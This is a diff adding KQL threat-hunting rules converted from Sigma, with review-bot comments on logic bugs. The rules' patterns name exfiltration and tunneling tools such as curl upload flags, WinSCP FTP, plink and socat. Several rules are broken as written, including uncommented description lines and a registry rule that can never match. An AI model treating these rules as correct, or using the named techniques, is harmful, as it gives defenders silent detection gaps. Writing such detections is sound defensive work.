+| where (FolderPath endswith "\\eqnedt32.exe" or FolderPath endswith "\\excel.exe" or FolderPath endswith "\\msaccess.exe" or FolderPath endswith "\\mspub.exe" or FolderPath endswith "\\powerpnt.exe" or FolderPath endswith "\\visio.exe" or FolderPath endswith "\\winword.exe") and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql b/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql
new file mode 100644
index 00000000..3f7f2608
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql
@@ -0,0 +1,10 @@
+// Title: Unusually Long PowerShell CommandLine
+// Author: oscd.community, Natalia Shornikova
+// Date: 2020-10-06
+// Level: low
+// Description: Detects unusually long PowerShell command lines with a length of 1000 characters or more
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.threat-hunting
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex ".{1000,}" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows Powershell" or ProcessVersionInfoProductName =~ "PowerShell Core 6")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql
new file mode 100644
index 00000000..d2bb54ce
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql
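Review bot: `ProcessCommandLine matches regex ".{1000,}"` on the last line runs a regex with a large counted repetition on every process event just to test length; `strlen(ProcessCommandLine) >= 1000` expresses the threshold the description states more cheaply and more readably. Note also that `.` does not match a newline in the RE2 dialect KQL uses, so a multi-line command line whose longest single line is under 1000 characters is missed by the regex but counted correctly by `strlen`.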
@@ -0,0 +1,10 @@
+// Title: WMI Module Loaded By Uncommon Process
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-08-10
+// Level: low
+// Description: Detects WMI modules being loaded by an uncommon process
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, detection.threat-hunting
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\WmiApRpl.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\WMINet_Utils.dll" or FolderPath endswith "\\wmiprov.dll" or FolderPath endswith "\\wmiutils.dll") and (not((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))) and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or (InitiatingProcessFolderPath endswith "\\WindowsAzureGuestAgent.exe" or InitiatingProcessFolderPath endswith "\\WaAppAgent.exe") or (InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon64.exe") or (InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe" or InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\Update.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe"))))
\ No newline at end of 
file
diff --git a/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql b/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql
new file mode 100644
index 00000000..675bc7a4
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql
@@ -0,0 +1,12 @@
+// Title: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
+// Author: Michael Haag
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.threat-hunting
+// False Positives:
+// - Some additional tuning is required. It is recommended to add the user profile path in CommandLine if it is getting too noisy.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".js" or ProcessCommandLine contains ".jse" or ProcessCommandLine contains ".vba" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".wsf") and ((ProcessVersionInfoOriginalFileName in~ ("wscript.exe", "cscript.exe")) or (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql b/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql
new file mode 100644
index 00000000..be2a82f7
--- /dev/null
+++ b/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql
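Review bot: In the extension test on the last line, `ProcessCommandLine contains ".js"` also matches `.json`, `.jsx` and any path segment containing that substring, and it already subsumes the separate `.jse` term, which adds noise to a rule whose false-positive note already calls it noisy. A boundary-anchored regex such as `ProcessCommandLine matches regex @"(?i)\.(jse?|vb[aes]|wsf)\b"` matches only the extensions the description lists.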
@@ -0,0 +1,10 @@
+// Title: FTP Connection Open Attempt Via Winscp CLI
+// Author: frack113
+// Date: 2025-10-12
+// Level: medium
+// Description: Detects the execution of Winscp with the "-command" and the "open" flags in order to open an FTP connection. Akira ransomware was seen using this technique in order to exfiltrate data.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "open " and ProcessCommandLine contains "ftp://") and (ProcessCommandLine contains "-command" or ProcessCommandLine contains "/command" or ProcessCommandLine contains "–command" or ProcessCommandLine contains "—command" or ProcessCommandLine contains "―command")) and (FolderPath endswith "\\WinSCP.exe" or ProcessVersionInfoOriginalFileName =~ "winscp.exe")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql b/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql
new file mode 100644
index 00000000..4202f810
--- /dev/null
+++ b/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Data Exfiltration Via Curl.EXE
+// Author: Florian Roth (Nextron Systems), Cedric MAURUGEON (Update)
+// Date: 2020-07-03
+// Level: medium
+// Description: Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105, detection.threat-hunting
+// False Positives:
+// - Scripts created by developers and admins
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " --form" or ProcessCommandLine contains " --upload-file " or ProcessCommandLine contains " --data " or ProcessCommandLine contains " --data-") or ProcessCommandLine matches regex "\\s-[FTd]\\s") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable")) and (not((ProcessCommandLine contains "://localhost" or ProcessCommandLine contains "://127.0.0.1")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql b/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql
new file mode 100644
index 00000000..53f32716
--- /dev/null
+++ b/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: Tunneling Tool Execution
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1041, attack.t1572, attack.t1071.001, detection.threat-hunting
+// False Positives:
+// - Legitimate administrators using one of these tools
+
+DeviceProcessEvents
+| where FolderPath endswith "\\httptunnel.exe" or FolderPath endswith "\\plink.exe" or FolderPath endswith "\\socat.exe" or FolderPath endswith "\\stunnel.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql b/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql
new file mode 100644
index 00000000..a71b0772
--- /dev/null
+++ b/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql
@@ -0,0 +1,10 @@
+// Title: Winscp Execution From Non Standard Folder
+// Author: frack113
+// Date: 2025-10-12
+// Level: medium
+// Description: Detects the execution of Winscp from an a non standard folder. This could indicate the execution of Winscp portable.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\WinSCP.exe" or ProcessVersionInfoOriginalFileName =~ "winscp.exe") and (not(FolderPath startswith "C:\\Program Files (x86)\\WinSCP\\"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql b/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql
new file mode 100644
index 00000000..c86edd2e
--- /dev/null
+++ b/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql
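Review bot: The exclusion on the last line of the WinSCP hunk, `not(FolderPath startswith "C:\\Program Files (x86)\\WinSCP\\")`, hard-codes the drive letter and only the 32-bit install directory, so an install on another system drive, or a 64-bit build under `\Program Files\WinSCP\` if those are deployed, is reported as "non standard". A drive-agnostic form such as `not(FolderPath contains ":\\Program Files (x86)\\WinSCP\\" or FolderPath contains ":\\Program Files\\WinSCP\\")` follows how the other rules in this patch (e.g. the WMI module rule) write system paths.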
@@ -0,0 +1,14 @@
+// Title: Process Terminated Via Taskkill
+// Author: frack113, MalGamy (Nextron Systems), Nasreddine Bencherchali
+// Date: 2021-12-26
+// Level: low
+// Description: Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity.
+Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.
+
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489, detection.threat-hunting
+// False Positives:
+// - Expected FP with some processes using this techniques to terminate one of their processes during installations and updates
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -im " or ProcessCommandLine contains " /im " or ProcessCommandLine contains " –im " or ProcessCommandLine contains " —im " or ProcessCommandLine contains " ―im " or ProcessCommandLine contains " -pid " or ProcessCommandLine contains " /pid " or ProcessCommandLine contains " –pid " or ProcessCommandLine contains " —pid " or ProcessCommandLine contains " ―pid ") and (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f " or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " /f" or ProcessCommandLine endswith " –f" or ProcessCommandLine endswith " —f" or ProcessCommandLine endswith " ―f") and (FolderPath endswith "\\taskkill.exe" or ProcessVersionInfoOriginalFileName =~ "taskkill.exe")) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp") and InitiatingProcessFolderPath endswith ".tmp")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql b/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql
new file mode 100644
index 00000000..95fb738b
--- /dev/null
+++ b/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: WebDAV Temporary Local File Creation
+// Author: Micah Babinski
+// Date: 2023-08-21
+// Level: medium
+// Description: Detects the creation of WebDAV temporary files with potentially suspicious extensions
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.resource-development, attack.t1584, attack.t1566, detection.threat-hunting
+// False Positives:
+// - Legitimate use of WebDAV in an environment
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV\\" and (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".ico" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".rar" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql b/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql
new file mode 100644
index 00000000..61ecdb7a
--- /dev/null
+++ b/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: SMB over QUIC Via Net.EXE
+// Author: frack113
+// Date: 2023-07-21
+// Level: medium
+// Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1570, detection.threat-hunting
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/TRANSPORT:QUIC" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql b/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql
new file mode 100644
index 00000000..ff89e930
--- /dev/null
+++ b/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql
@@ -0,0 +1,14 @@
+// Title: Execution From Webserver Root Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003, detection.threat-hunting
+// False Positives:
+// - Various applications
+// - Tools that include ping or nslookup command invocations
+
+DeviceProcessEvents
+| where (FolderPath contains "\\wwwroot\\" or FolderPath contains "\\wmpub\\" or FolderPath contains "\\htdocs\\") and (not(((FolderPath contains "bin\\" or FolderPath contains "\\Tools\\" or FolderPath contains "\\SMSComponent\\") and InitiatingProcessFolderPath endswith "\\services.exe")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql b/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql
new file mode 100644
index 00000000..630a326e
--- /dev/null
+++ b/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql
@@ -0,0 +1,12 @@
+// Title: Shell Context Menu Command Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-06
+// Level: low
+// Description: Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.threat-hunting
+// False Positives:
+// - Likely from new software installation suggesting to add context menu items. Such as "PowerShell", "Everything", "Git", etc.
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\Classes*" and RegistryKey endswith "\\shell*" and RegistryKey endswith "\\command*"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql b/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql
new file mode 100644
index 00000000..5814347e
--- /dev/null
+++ b/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql
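Review bot: The three `endswith` predicates in the `| where` carry the Sigma wildcard `*` through as a literal character, so they only match a key that ends in the text `Classes*`, `shell*` or `command*` — and since a single string cannot end with all three suffixes at once, the rule can never return a row. The intended filter is `| where RegistryKey contains "\\Software\\Classes\\" and RegistryKey contains "\\shell\\" and RegistryKey endswith "\\command"`. This looks like a converter bug in the handling of trailing-wildcard `endswith` modifiers, so the other registry rules produced by the same run are worth grepping for `endswith "...*"`.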
@@ -0,0 +1,15 @@
+// Title: Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-09-02
+// Level: low
+// Description: Detects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory.
+The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object.
+Investigation of the loading application and its behavior is required to determining if its malicious.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting
+// False Positives:
+// - Some installers might generate false positives, apply additional filters accordingly.
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\taskschd.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "taskschd.dll") and (InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Desktop\\" or InitiatingProcessFolderPath contains "\\Downloads\\")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql b/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql
new file mode 100644
index 00000000..89247aee
--- /dev/null
+++ b/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql
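Review bot: The branch `InitiatingProcessVersionInfoOriginalFileName =~ "taskschd.dll"` in the first condition tests the version info of the process doing the loading, not of the loaded image — in `DeviceImageLoadEvents` the image is described by `FolderPath`/`FileName` and the loader by the `InitiatingProcess*` columns — so that branch is dead and the `FolderPath endswith "\\taskschd.dll"` test is doing all the work. It is harmless as an `or`, but misleading; drop it, or if the intent was to catch a renamed copy of the DLL, confirm against the table schema whether an image-side OriginalFileName column exists at all (as far as I know it does not). A one-line comment above the `| where` noting that the match is path-only would set expectations for the hunter.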
@@ -0,0 +1,11 @@
+// Title: Elevated System Shell Spawned
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2023-11-23
+// Level: medium
+// Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1059, detection.threat-hunting
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "powershell_ise.EXE", "pwsh.dll", "Cmd.Exe"))) and (LogonId =~ "0x3e7" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql b/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql
new file mode 100644
index 00000000..e2b6695b
--- /dev/null
+++ b/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql
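Review bot: The privilege test at the end of the `| where` is unlikely to ever match in Defender data: as far as I recall `LogonId` in `DeviceProcessEvents` is a numeric column (the SYSTEM logon session is 999, i.e. 0x3e7), so `LogonId =~ "0x3e7"` compares a number to a hex string, and the `NT AUTHORITY` part of the Sigma `User` field lands in `AccountDomain`, while `AccountName` is just `system`, so `AccountName contains "AUTHORI"` is never true. Suggest `and LogonId == 999 and (AccountDomain contains "AUTHORI" or AccountDomain contains "AUTORI")`, and run it against a known SYSTEM-spawned `cmd.exe` to confirm before relying on it. Since this rule is meant to surface privilege escalation, a silent non-match is worse than noise.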
@@ -0,0 +1,14 @@
+// Title: Creation of an Executable by an Executable
+// Author: frack113
+// Date: 2022-03-09
+// Level: low
+// Description: Detects the creation of an executable by another executable.
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001, detection.threat-hunting
+// False Positives:
+// - Software installers
+// - Update utilities
+// - 32bit applications launching their 64bit versions
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith ".exe" and FolderPath endswith ".exe") and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Windows Defender\\") or (InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework" and InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and FolderPath contains ":\\Windows\\assembly") or (InitiatingProcessFolderPath endswith ":\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\cleanmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\dxgiadaptercache.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\Dism.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wuauclt.exe") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\GitHubDesktop\\Update.exe" and FolderPath contains "\\AppData\\Local\\SquirrelTemp\\") or ((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and FolderPath contains ":\\Windows\\assembly\\NativeImages_") or 
((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\") or (FolderPath contains ":\\Program Files\\" or FolderPath contains ":\\Program Files (x86)\\")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and (FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\stage\\Teams.exe" or FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\stage\\Squirrel.exe" or FolderPath endswith "\\AppData\\Local\\Microsoft\\SquirrelTemp\\tempb\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") or (InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" and InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\svchost.exe" and FolderPath contains ":\\Windows\\SoftwareDistribution\\Download\\") or (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\svchost.exe" and (FolderPath contains ":\\WUDownloadCache\\" and FolderPath contains "\\WindowsUpdateBox.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" and InitiatingProcessFolderPath endswith "\\Microsoft VS Code\\Code.exe" and FolderPath contains "\\.vscode\\extensions\\") or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" or (InitiatingProcessFolderPath contains ":\\WINDOWS\\TEMP\\" or FolderPath contains ":\\WINDOWS\\TEMP\\") or (InitiatingProcessFolderPath contains ":\\WINDOWS\\SoftwareDistribution\\Download\\" and InitiatingProcessFolderPath endswith "\\WindowsUpdateBox.Exe" and FolderPath contains ":\\$WINDOWS.~BT\\Sources\\")))) and (not(((InitiatingProcessFolderPath endswith "\\ChromeSetup.exe" and FolderPath contains "\\Google") or (InitiatingProcessFolderPath contains "\\Python27\\python.exe" and (FolderPath contains "\\Python27\\Lib\\site-packages\\" or FolderPath contains "\\Python27\\Scripts\\" or FolderPath contains 
"\\AppData\\Local\\Temp\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\SquirrelTemp\\Update.exe" and FolderPath contains "\\AppData\\Local"))))
\ No newline at end of file
diff --git a/KQL/rules/Collection/7zip_compressing_dump_files.kql b/KQL/rules/Collection/7zip_compressing_dump_files.kql
new file mode 100644
index 00000000..5d6b1c5e
--- /dev/null
+++ b/KQL/rules/Collection/7zip_compressing_dump_files.kql
@@ -0,0 +1,13 @@
+// Title: 7Zip Compressing Dump Files
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-27
+// Level: medium
+// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally
+// - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql b/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql
new file mode 100644
index 00000000..48f96a88
--- /dev/null
+++ b/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql
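Review bot: The `| where` of the "Creation of an Executable by an Executable" hunk (it begins three lines up) has no `ActionType` filter, so an `.exe` parent that deletes, renames or rewrites another `.exe` is reported as a "creation"; add `ActionType == "FileCreated"` to the first conjunction alongside the two `endswith ".exe"` tests. Separately, the exclusion `(InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\")` silently drops every executable written to or from a user's Temp folder; that mirrors the upstream Sigma filter, but since Temp is a common drop location it deserves a header comment such as `// NOTE: Temp-folder activity is excluded for noise; pair with a dedicated Temp drop rule.` so the blind spot is visible to hunters.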
@@ -0,0 +1,17 @@
+// Title: Attempts of Kerberos Coercion Via DNS SPN Spoofing
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-20
+// Level: high
+// Description: Detects the presence of "UWhRC....AAYBAAAA" pattern in command line.
+The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
+Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
+It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records
+to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.
+If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
+or checking for the presence of such records through the `nslookup` command.
+
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.credential-access, attack.persistence, attack.privilege-escalation, attack.t1557.001, attack.t1187
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "UWhRCA" and ProcessCommandLine contains "BAAAA"
\ No newline at end of file
diff --git a/KQL/rules/Collection/audio_capture_via_powershell.kql b/KQL/rules/Collection/audio_capture_via_powershell.kql
new file mode 100644
index 00000000..0fdfc724
--- /dev/null
+++ b/KQL/rules/Collection/audio_capture_via_powershell.kql
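Review bot: KQL's `contains` is case-insensitive, but `UWhRCA` and `BAAAA` are fragments of a base64 string where letter case is part of the signal, so the `| where` will also match command lines containing `uwhrca`/`baaaa` in any casing and the `high` level becomes less trustworthy. Use the case-sensitive operator for both predicates: `| where ProcessCommandLine contains_cs "UWhRCA" and ProcessCommandLine contains_cs "BAAAA"`. It is also worth a one-line comment that the two fragments are a deliberately loosened form of the `1UWhRCAAAAA..BAAAA` marshaled CREDENTIAL_TARGET_INFORMATION pattern named in the description, so nobody "tightens" it back without checking the original Sigma rule.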
@@ -0,0 +1,12 @@
+// Title: Audio Capture via PowerShell
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects audio capture via PowerShell Cmdlet.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1123
+// False Positives:
+// - Legitimate audio capture by legitimate user.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "WindowsAudioDevice-Powershell-Cmdlet" or ProcessCommandLine contains "Toggle-AudioDevice" or ProcessCommandLine contains "Get-AudioDevice " or ProcessCommandLine contains "Set-AudioDevice " or ProcessCommandLine contains "Write-AudioDevice "
\ No newline at end of file
diff --git a/KQL/rules/Collection/audio_capture_via_soundrecorder.kql b/KQL/rules/Collection/audio_capture_via_soundrecorder.kql
new file mode 100644
index 00000000..631ccf07
--- /dev/null
+++ b/KQL/rules/Collection/audio_capture_via_soundrecorder.kql
@@ -0,0 +1,12 @@
